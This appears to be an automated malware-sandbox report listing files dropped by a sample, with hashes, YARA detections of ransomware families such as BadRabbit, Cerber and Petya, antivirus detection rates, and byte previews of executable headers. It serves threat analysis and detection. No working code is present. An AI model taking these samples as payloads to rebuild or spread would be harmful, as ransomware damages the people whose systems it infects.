                                                                                                                                                    Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V...si....|i.&R....k#a+O..#.....Ow$.r..T..>2..,...m}2...V6..]:.^.j.....v.g...{...S.E.\......@#.......&....&VJ.2B.[....h.Z..H.....7.."H..w..p.f]G.n..D...9h.....C....t^).w.n....f=.B......r.*.._"8..\..m~!.....6)M,.....7.8........59....i.7.*V>.HP....gf"eAa.S...ek..[.Q..`h.m..o.d5...7.S%.....P)#....E........|........\.b\.*...&.Ik...;....i..x.r.....Q!.......cU...@.J..:J`..7O.C....^..j.\3...Z...r..{.4&._...lZ/....^~.........d....u.......h.Z.A.'M4.38Bc.;....y.....-v.<h...c...].2......b......*....&...4.U..........|......`.t.@............c.n..(.r...P6.....'.>...o...3a..7.Dh..&...=..........[MU..B....a...S..(XWE.....x.3)/.....!..t..4..@.:.:=.6.8.r.#O.$...Q...,....fLn.Z.9WL..(....=#*-....?.l.Y.*.L\..-.._I9..5.]..O.SN.k...........|.[....8.=......mo...R..2yN.n.. ..zO..x..#%....`A6...w{5Mub.nM.m*\.^'.,..F.....md.5."...(J...S...s.jb.2.*...q6....)./b.%..> H.m...v....D..}.....<...^`.:.uq3.......
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):441899
                                                                                                                                                    Entropy (8bit):7.891913976230692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                                                                                                    MD5:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                    SHA1:DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
                                                                                                                                                    SHA-256:630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
                                                                                                                                                    SHA-512:74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):119296
                                                                                                                                                    Entropy (8bit):7.911347099102218
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
                                                                                                                                                    MD5:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                    SHA1:FB1E8385691FA3293B7CBFB9B2656CF09F20E722
                                                                                                                                                    SHA-256:B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
                                                                                                                                                    SHA-512:76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):320760
                                                                                                                                                    Entropy (8bit):6.315890725389197
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                                                                    MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                    SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                                                                    SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                                                                    SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 76%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):495616
                                                                                                                                                    Entropy (8bit):6.338057450703654
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                                                                    MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                    SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                                                                    SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                                                                    SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 69%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):195400
                                                                                                                                                    Entropy (8bit):7.873003999274124
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:15TDpNFVbxDSXJFFGhcBR1WLZ37p73G8Wn7GlDOg+ELqdSxo5XtIZjnvxRJgghaR:157TcfFPB6B3GL7g+me5aZjn5VlI9T/
                                                                                                                                                    MD5:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                    SHA1:C53C140BBDEB556FCA33BC7F9B2E44E9061EA3E5
                                                                                                                                                    SHA-256:51290129CCCCA38C6E3B4444D0DFB8D848C8F3FC2E5291FC0D219FD642530ADC
                                                                                                                                                    SHA-512:582B917864903252731C3D0DFF536D7B1E44541EE866DC20E0341CBEE5450F2F0FF4D82E1EEE75F770E4DAD9D8B9270AB5664FFEDFE21D1AD2BD7FE6BC42CF0E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................^...|.......0.......p....@..........................0......7........................................t.......p..h...............h............................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...h....p.......z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2007552
                                                                                                                                                    Entropy (8bit):7.761090155030316
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:49152:p/VoMTzwF77l0VqmuTefhLTtk31XyXb9:ptoMTzwVmq3ettk31ob9
                                                                                                                                                    MD5:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                    SHA1:48C4FCB17E93B74030415996C0EC5C57B830EA53
                                                                                                                                                    SHA-256:64677F7767D6E791341B2EAC7B43DF90D39D9BDF26D21358578D2D38037E2C32
                                                                                                                                                    SHA-512:373F91981832CD9A1FF0B8744B43C7574B72971B5B6B19EA1F4665B6C878F7A1C7834AC08B92E0ECA299EB4B590BF10F48A0485350A77A5F85FC3D2DD6913DB3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 36%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,7.M.................H...V.......f... ........@.. ....................... ............@..................................f..K.......@P........................................................................... ............... ..H............text....F... ...H.................. ..`.sdata...............L..............@....rsrc...@P.......R...N..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):216064
                                                                                                                                                    Entropy (8bit):3.1340875869032985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:YoCFfC303p22fkZrRQpnqjoi7l832fbu9ZXILwVENbM:rCVC303p22sZrRQpnviB832Du9WMON
                                                                                                                                                    MD5:B805DB8F6A84475EF76B795B0D1ED6AE
                                                                                                                                                    SHA1:7711CB4873E58B7ADCF2A2B047B090E78D10C75B
                                                                                                                                                    SHA-256:F5D002BFE80B48386A6C99C41528931B7F5DF736CD34094463C3F85DDE0180BF
                                                                                                                                                    SHA-512:62A2C329B43D186C4C602C5F63EFC8D2657AA956F21184334263E4F6D0204D7C31F86BDA6E85E65E3B99B891C1630D805B70997731C174F6081ECC367CCF9416
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_infinitylock, Description: Yara detected InfinityLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: Joe Security
                                                                                                                                                    • Rule: MALWARE_Win_InfinityLock, Description: Detects InfinityLock ransomware, Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, Author: ditekSHen
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...sWAY.....................d......^.... ... ....@.. ....................................`.....................................W....@..._........................... ............................................... ............... ..H............text...d.... ...................... ..`.sdata..8.... ......................@....rsrc...._...@...`..................@..@.reloc...............J..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):6438912
                                                                                                                                                    Entropy (8bit):6.6234173300696355
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:98304:hvOOFJ+Z8eAgy7SH9s76RSvyqJOBgECfMfYv+85JH0DVczt8A:hvOOFJ+ggr9s76R+wcMAv+IHCczt8
                                                                                                                                                    MD5:04155ED507699B4E37532E8371192C0B
                                                                                                                                                    SHA1:A14107131237DBB0DF750E74281C462A2EA61016
                                                                                                                                                    SHA-256:B6371644B93B9D3B9B32B2F13F8265F9C23DDECC1E9C5A0291BBF98AA0FC3B77
                                                                                                                                                    SHA-512:6DE59EBBC9B96C8A19D530CAA13AA8129531EBD14B3B6C6BBB758426B59ED5AB12483BFA232D853AF2E661021231B4B3FCC6C53E187EEBA38FA523F673115371
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................^&...;.....tp&.......&..............................@b..................@............................'..N...0*...8...................'.T8............................'.....................D.'..............................text....8&......8&................. ..`.itext..."...P&.."...P&............. ..`.data........&......&.............@....bss.....`....'..`....'..................idata...N....'..N....'.............@....tls....L.....'.L.....'..................rdata........'.......'.............@..@.reloc..T8....'.T8....'.............@..B.rsrc.....8..0*...8..0*.............@..@.............0a......v`.............@..@................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):54569
                                                                                                                                                    Entropy (8bit):6.640114556707396
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:4yKoNLsn4Jp9ZvRInygrpMoZN+WtOl08jxBEHCDwBLpZTPCUvQK:j/sn4/OycxZN+MKxp8t9zQK
                                                                                                                                                    MD5:87CCD6F4EC0E6B706D65550F90B0E3C7
                                                                                                                                                    SHA1:213E6624BFF6064C016B9CDC15D5365823C01F5F
                                                                                                                                                    SHA-256:E79F164CCC75A5D5C032B4C5A96D6AD7604FAFFB28AFE77BC29B9173FA3543E4
                                                                                                                                                    SHA-512:A72403D462E2E2E181DBDABFCC02889F001387943571391BEFED491AAECBA830B0869BDD4D82BCA137BD4061BBBFB692871B1B4622C4A7D9F16792C60999C990
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 86%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.{.#q..#q..#q..@S?.!q...n...q...UU."q...UP."q..Rich#q..........................PE..L...X\q@.................L...........7.......`....@..................................:......................................db..........pG...........................................................................`..d............................text...(K.......L.................. ..`.rdata..|....`.......P..............@..@.data....3...p.......`..............@....rsrc...pG.......H...n..............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1182593
                                                                                                                                                    Entropy (8bit):7.772772849171323
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:pXhZgPlmWcA4Te9+g6+lET/+xRXKRwFSmjTGIWrwg:xInpSe99pCkRXKRMdGIWrN
                                                                                                                                                    MD5:2EB3CE80B26345BD139F7378330B19C1
                                                                                                                                                    SHA1:10122BD8DD749E20C132D108D176794F140242B0
                                                                                                                                                    SHA-256:8ABED3EA04D52C42BDD6C9169C59212A7D8C649C12006B8278EDA5AA91154CD2
                                                                                                                                                    SHA-512:E3223CD07D59CD97893304A3632B3A66FD91635848160C33011C103CCA2BADBFE9B78FE258666B634E455872F3A98889EDE5A425D8FAE91CAE6983DA1EA1190A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L...~.r\.....................>......y.............@..........................p............@............................4.......<.......$s...................P.......n..T...........................(...@...............\...T... ....................text...d........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...$s.......t..................@..@.reloc.......P... ..................@..B................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):424448
                                                                                                                                                    Entropy (8bit):7.802970757279057
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:BCoFAtv2DDWANPG4F0vwDsl6JEFiGUHzAB4lTa7tKzWNYRbvhLWxsqgyn:koOv2D60PLyvaJTT9Za7kziYD69g
                                                                                                                                                    MD5:D0DEB2644C9435EA701E88537787EA6E
                                                                                                                                                    SHA1:866E47ECD80DA89C4F56557659027A3AEE897132
                                                                                                                                                    SHA-256:AD6CD46F373AADAD85FAB5ECDB4CB4AD7EBD0CBE44C84DB5D2A2EE1B54EB5EC3
                                                                                                                                                    SHA-512:6FAAC2E1003290BB3A0613EE84D5C76D3C48A4524E97975E9174D6FCFB5A6A48D6648B06ED5A4C10C3349F70EFFFC6A08A185FDEB0824250AE044B96EF39FCDF
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 80%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.R=.R=.R...R6.R=.R+.R..R<.R...R<.R..R<.RRich=.R........PE..L.....7O...................._....................................................................@..........................l...x.......................................................................................l............................text...h........................... ..`.rdata..............................@..@.data...<...........................@....tls................................@....rsrc...............................@..@.sdata...............p..............@....wdata...............r..............@....rdata...............t..............@....fdata...............v..............@....mdata...............x..............@...........................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):10148025
                                                                                                                                                    Entropy (8bit):7.9801835318970475
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:196608:CtbTP1ErBwMQjd1YTHdmpCP2PVgP/acIE/xQ0zyZejVk+YzbRdTZ:C1E1+dYx6OP9hdyZwV4zd
                                                                                                                                                    MD5:1F13396FA59D38EBE76CCC587CCB11BB
                                                                                                                                                    SHA1:867ADB3076C0D335B9BFA64594EF37A7E2C951FF
                                                                                                                                                    SHA-256:83ECB875F87150A88F4C3D496EB3CB5388CD8BAFDFF4879884ECECDBD1896E1D
                                                                                                                                                    SHA-512:82CA2C781BDAA6980F365D1EEDB0AF5AC5A80842F6EDC28A23A5B9EA7B6FEEC5CD37D54BD08D9281C9CA534ED0047E1E234873B06C7D2B6FE23A7B88A4394FDC
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 20%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................F..........hT.......`....@.................................1............@..................................................................................................................................................CODE.....D.......F.................. ..`DATA.....(...`...*...J..............@...BSS..................t...................idata...............t..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P............. ......................@..P........................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1427968
                                                                                                                                                    Entropy (8bit):6.856188310924527
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:WZgSKWk54jeg6lL5assQHtzV2KoLJ+PwXxwuLSJ8slf1zMr6iL/KNDx2PIXe2Q:KgoLetlLS8tz6V+PwD0XVMrXCNDxtK
                                                                                                                                                    MD5:63210F8F1DDE6C40A7F3643CCF0FF313
                                                                                                                                                    SHA1:57EDD72391D710D71BEAD504D44389D0462CCEC9
                                                                                                                                                    SHA-256:2AAB13D49B60001DE3AA47FB8F7251A973FAA7F3C53A3840CDF5FD0B26E9A09F
                                                                                                                                                    SHA-512:87A89E8AB85BE150A783A9F8D41797CFA12F86FDCCB48F2180C0498BFD2B1040B730DEE4665FE2C83B98D436453680226051B7F1532E1C0E0CDA0CF702E80A11
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 72%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..=...n...n...n5g.n...n...n...n..6n...n...n...n..!n...n..$n...nRich...n................PE..L...c@)Y.................P...v...... ........`....@..................................................................................`...............................................................................`...............................text....N.......P.................. ..`.rdata..|....`.......T..............@..@.data........P.......6..............@....rsrc....|...`.......<..............@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):899582
                                                                                                                                                    Entropy (8bit):7.955977131352216
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:bUWqistOB98g0Z1hPLX2jOmsQl3eW0a92Vdcvd7wR:bUUZ98g0FPLIRl3sa92Hcvd8R
                                                                                                                                                    MD5:E4D4A59494265949993E26DEE7B077D1
                                                                                                                                                    SHA1:83E3D0C7E544117D6054E7D55932A7D2DBAF1163
                                                                                                                                                    SHA-256:5AE57D8750822C203F5BF5E241C7132377B250DF36A215DFF2F396C8440B82DD
                                                                                                                                                    SHA-512:EFD176555415E0771A22A6CA6F15A82AEC14CA090D2599959612DB9D8E07065E38A7B82E2BF7BE67CBE1494733344879782F5516BB502E0177E7B540C96FA718
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.....................X.............. ....@..........................P......7...............................P7..3....(...........:..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc....:.......<...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Create Time/Date: Mon Jun 21 08:00:00 1999, Name of Creating Application: Windows Installer, Security: 1, Code page: 1252, Template: Intel;1033, Number of Pages: 200, Revision Number: {E3A8E397-19CD-45D5-9611-44A2EB0D7861}, Title: PC Defender, Author: Def Group, Number of Words: 2, Last Saved Time/Date: Mon Sep 6 19:10:34 2010, Last Printed: Mon Sep 6 19:10:34 2010
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):881152
                                                                                                                                                    Entropy (8bit):7.905751034096731
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:TkRBL2LYcyvue73Ze+RrM31N0vhMN0T4+ZI:TkRBLgiue73Ze+SWI+Z
                                                                                                                                                    MD5:B3DCE5C3F95A18FD076FAD0F73BB9E39
                                                                                                                                                    SHA1:E80CC285A77302EE221F47E4E94823D4B2EBA368
                                                                                                                                                    SHA-256:DF2E3B2222DCDBB5E0DBDD1200EC8FD5F67FCBEA99E0023DF54307EAB60030FF
                                                                                                                                                    SHA-512:C184436055CF74884AD0D2BD5CA00BCD5A62D6BE46253FE8C71B4DAAA5C710B9DF34AF1B6E41F6D1AF94BCDEC0D33679A6A1B34BF9755678B4E177F368C11D4C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:......................>...................................8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................Z................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...^...b...:...;...<...=...>...?...@...A...B...C...D...Y...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X.......`...[...\...]...s..._...t...a...c...{...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...x...v...u...w...~...y...|...z...
                                                                                                                                                    Process:C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):230912
                                                                                                                                                    Entropy (8bit):6.8803725877131
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:DCyjXhd1mialK+qoNr8PxtZE6x5v+k6f:rjXhd8ZlKOrMZE6x5b6f
                                                                                                                                                    MD5:AF2379CC4D607A45AC44D62135FB7015
                                                                                                                                                    SHA1:39B6D40906C7F7F080E6BEFA93324DDDADCBD9FA
                                                                                                                                                    SHA-256:26B4699A7B9EEB16E76305D843D4AB05E94D43F3201436927E13B3EBAFA90739
                                                                                                                                                    SHA-512:69899C47D0B15F92980F79517384E83373242E045CA696C6E8F930FF6454219BF609E0D84C2F91D25DFD5EF3C28C9E099C4A3A918206E957BE806A1C2E0D3E99
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: Petya_Ransomware, Description: Detects Petya Ransomware, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: Florian Roth
                                                                                                                                                    • Rule: Ransom_Petya, Description: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, Author: CCN-CERT
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                    • Antivirus: Metadefender, Detection: 84%, Browse
                                                                                                                                                    Reputation:unknown
